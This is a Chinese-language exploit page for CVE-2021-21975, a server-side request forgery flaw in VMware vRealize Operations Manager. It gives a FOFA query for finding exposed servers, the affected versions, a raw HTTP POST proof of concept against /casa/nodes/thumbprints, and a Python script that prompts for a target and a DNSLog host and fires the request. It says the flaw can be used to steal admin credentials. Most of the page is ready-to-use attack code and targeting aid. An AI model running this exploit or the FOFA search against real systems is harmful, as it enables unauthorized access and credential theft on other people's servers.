VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975).md

2.57 KB / 2021-05-21 09:14:38
    # VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975)

攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击，从而窃取管理凭据，获得一些功能的控制权限。

OVA下载：https://my.vmware.com/group/vmware/patch#search

FOFA:

```
app="vmware-vRealize-Operations-Manager"
```

影响版本：

* vRealize Operations Manager 8.3.0
* vRealize Operations Manager 8.2.0
* vRealize Operations Manager 8.1.1
* vRealize Operations Manager 8.1.0
* vRealize Operations Manager 8.0.1
* vRealize Operations Manager 8.0.0
* vRealize Operations Manager 7.5.0

**PoC：**

```
POST /casa/nodes/thumbprints HTTP/1.1
Host:target
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

["127.0.0.1:443/ui/"]
```

nuclei poc：https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml

poc.py：

```py
# CVE-2021-21975
# fofa：title=“vRealize Operations Manager”

import requests
import urllib3

urllib3.disable_warnings()

def title():
    print("[-------------------------------------------------------------]")
    print("[-------- VMware vRealize Operations Manager SSRF漏洞 ---------]")
    print("[--------               CVE-2021-21975               ----------]")
    print("[--------       use:python3 CVE-2021-21975         ------------]")
    print("[--------              Author:Henry4E36            ------------]")
    print("[-------------------------------------------------------------]")


def target_url(url,dnslog):
    target_url = url + "/casa/nodes/thumbprints"
    headers = {
        "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
        "Content-Type" : "application/json;charset=UTF-8"
    }
    data = f'["{dnslog}"]'
    try:
        res = requests.post(url=target_url,headers=headers,data=data,verify=False,timeout=5)
        if res.status_code == 200:
            print(f"[!]  \033[31m目标系统: {url} 可能存在SSRF漏洞，请检查DNSLog响应！\033[0m")
            print(f"[0]  响应为:{res.text}")
        else:
            print(f"[0]  目标系统: {url} 不存在SSRF漏洞")
    except Exception as e:
        print("[!]  目标系统出现意外错误！\n",e)


if __name__ == "__main__":
    title()
    url = str(input("[-] 请输入需要检测的URL:\n"))
    dnslog = str(input("[-] 请输入DNSlog:\n"))
    target_url(url,dnslog)
```

ref：

* https://www.vmware.com/security/advisories/VMSA-2021-0004.html
* https://forum.ywhack.com/thread-115338-1-7.html